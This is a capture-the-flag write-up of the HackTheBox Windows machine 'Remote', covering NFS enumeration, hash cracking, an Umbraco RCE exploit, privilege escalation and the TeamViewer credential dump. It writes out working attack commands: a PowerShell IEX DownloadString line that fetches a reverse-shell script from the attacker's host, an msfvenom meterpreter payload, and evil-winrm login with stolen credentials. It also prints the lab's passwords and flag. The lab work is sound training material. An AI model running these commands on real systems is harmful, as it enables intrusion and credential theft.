Hey ! Today's writeup is on Remote, an Easy Windows Box released on March 21st 2020 on HackTheBox.
If you have VIP access on the website, you can access it here : https://www.hackthebox.eu/home/machines/profile/234
It was my first Windows box. It's been quite some time now that I wanted to do one, but it isn't easy to start from scratch. Indeed, Windows and Linux boxes aren't the same at all. While when starting Linux boxes I had experience with the Linux terminal, I had none with the Windows Powershell. Therefore, I struggled to get this box done, but now I did, and I am very happy to present to you my writeup of it.
Like always, I performed a Nmap scan
nmap -A -p- -T4 10.10.10.180
I am using the same flags as always :
- -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
- -p- : nmap scans every port
- -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)
Here are the scan results :
Nmap scan report for 10.10.10.180 Host is up (0.089s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Home - Acme Widgets 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 2049/tcp open mountd 1-3 (RPC #100005) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49678/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49680/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=6/29%OT=21%CT=1%CU=43315%PV=Y%DS=2%DC=T%G=Y%TM=5EFA427 OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=103%TI=I%CI=I%II=I%SS=S%TS= OS:U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS OS:%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y% OS:DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD= OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R= OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F= OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD= OS:Z) Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 4m20s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-29T19:38:43 |_ start_date: N/A TRACEROUTE (using port 110/tcp) HOP RTT ADDRESS 1 88.03 ms 10.10.14.1 2 87.58 ms 10.10.10.180 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 568.54 seconds
After taking a close look a the result file, I noticed NFS files. NFS is a protocol that allows hosts to access files on a remote server. Keep in mind that Nmap is a very powerfull tool, that has many scripts to check all sorts of things. For example by doing
nmap --script=nfs-showmount 10.10.10.180
you are checking for NFS mounting points. Here we get
site_backup. It's a promising lead. All I had to do is mount it :
$ mkdir mnt $ sudo mount 10.10.10.180:/site_backups mnt
After some enumeration by hand on the mounted folder, I found an .sdf file :
App_Data/Umbraco.sdf. SFD files are compact databases saved in SQL CE Format (SQL Server Compact Format). It's a perfect place to find credentials.
Just before we take a look at it, the exploration of the website didn't seem to lead anywhere at first (I skipped directory busting, my mistake), but with this file, it is very likely that the website is based on the opensource CMS Umbraco, so I tried to navigate to :
10.10.10.180/Umbraco/. And Bingo !
I tried some basic SQL injections but without success, we will come back later with credentials.
Now back to our Umbraco.sdf. First thing I tried worked (a bit in a luck for once. 🙂
strings Umbraco.sdf | grep admin
We get a username, and a password hash.
Let's get the password corresponding to the hash with crackstation (https://crackstation.net/)
We can now use the credentials
[email protected] and
baconandcheese to login to the Umbraco CMS page.
There is a way to upload files, that could prove itself useful later, but not to own user. For that part, I found a python script that can get access using a Umbraco vulnerability, when provided with username/password. Here is the link to it : https://github.com/noraj/Umbraco-RCE
You can pass a PowerShell command as an argument. To try it out, just pass "ls" or "dir".
$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "dir C:/users" Directory: C:\users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/19/2020 3:12 PM .NET v2.0 d----- 2/19/2020 3:12 PM .NET v2.0 Classic d----- 2/19/2020 3:12 PM .NET v4.5 d----- 2/19/2020 3:12 PM .NET v4.5 Classic d----- 7/8/2020 2:57 AM Administrator d----- 2/19/2020 3:12 PM Classic .NET AppPool d-r--- 7/8/2020 8:55 AM Public
We could adjust the commands to printout the user flag, that is located in
C:/users/Public/user.txt, or do something more fun, I hereby summon the reverse shell.
I used the mini-reverse.ps1 script. You can easily find it online, make sure to change your IP address to the one given by openvpn, and the port to the one you have forwarded. Then put it in a server folder, and start a little server :
$ mkdir server $ cp mini-reverse.ps1 server/ $ cd server $ sudo python -m http.server --bind
If you go to your web browser and type in
Once the python server is up and running start listening on the port you chose, for me 8888.
nc -lvnp 8888
I explain a little VERY useful tip about Netcat based reverse shells in my "HackTheBox Beginner Guide", make sure to check it out if you're totally new to this, or even if not, to give me some advice 😉
Now that the server runs and Netcat is listening, just launch the reverse shell.
python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://
After a few seconds, a windows shell should pop up in the terminal you were listening with. If not check that your VPN is still running, that the request made to the server for mini-reverse.ps1 indicates 200, and that IPs and ports are the right ones. If everything is right, just kill everything and start over.
We just need to print the flag, and we're done for this part !
$ cd C:\users\Public $ type user.txt
I found two ways to get root, one that depends on the access you have managed to establish, but is faster, and the other one that always works, but takes a bit longer to perform.
I'll show the second one in this writeup.
Just know that the other method is using the PowerUp.ps1 script to perform a ServiceAbuse to add an Administrator account to logging to with evil-winrm.
When looking at the processes running on the machine (by using
ps), I noticed TeamViewer was running. As it is a graphical app, and Remote is a Easy box, it couldn't be running if it wasn't useful at some point.
I found a way to gather credentials in TeamViewer, through Metasploit. The only requirement is to acquire a meterpreter session. To do so I tried to get a reverse shell using the metasploit handler.
$ msfconsole msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp
I first started the metasploitable framework, set the exploit to
multi/handler and the payload to a TCP meterpreter reverse shell for windows 64bits.
You then need to specify your IP and port, and just start listening and your are good to go on this side.
msf5 exploit(multi/handler) > set LPORT 8888 LPORT => 8888 msf5 exploit(multi/handler) > set LHOST
LHOST => msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.0.94:8888
The second part is to get the remote host to execute your reverse shell. I first tried the same method than before with the python script, but you then get a message that a meterpreter session was opened, but you will not get the prompt back. And that is because the
multi/handler actually needs to have a sort of Trojan executed on the machine.
Luckily for us, that isn't hard with msfvenom (a complimentary tool to metasploit).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=
LPORT=8888 -f exe > privesc.exe
This will generate a Windows executable file, that we need to upload on the target machine. Told you that Umbraco file upload page was going to come in handy 😉
Go to media, and import the privesc.exe file. Then find where your file is. It is in one of the subdirectories in
$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "C:/inetpub/wwwroot/Media/1035/privesc.exe"
Great ! We now have our meterpreter session !
[*] Started reverse TCP handler on 10.10.15.48:8888 [*] Sending stage (201283 bytes) to 10.10.10.180 [*] Meterpreter session 1 opened (10.10.15.48:8888 -> 10.10.10.180:49759) at 2020-07-08 16:11:42 +0200 meterpreter >
To run the tool I spoke about, juste type the following command in meterpreter :
meterpreter > run post/windows/gather/credentials/teamviewer_passwords [*] Finding TeamViewer Passwords on REMOTE [+] Found Unattended Password: !R3m0te! [+] Passwords stored in: /home/leo/.msf4/loot/20200708162410_default_10.10.10.180_host.teamviewer__598662.txt
We got our self a password 🙂
Let's see if it the admin password we are looking for. To connect to a windows machine with credentials, evil-winrm is a great tool. You can find it here : https://github.com/Hackplayers/evil-winrm
Here it how it's used :
$ evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!' Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> type C:/users/Administrator/Desktop/root.txt 69ee6ac83f153675310f9894b92e1ca2
That's it for this writeup ! I hope you enjoyed, and see you for another one !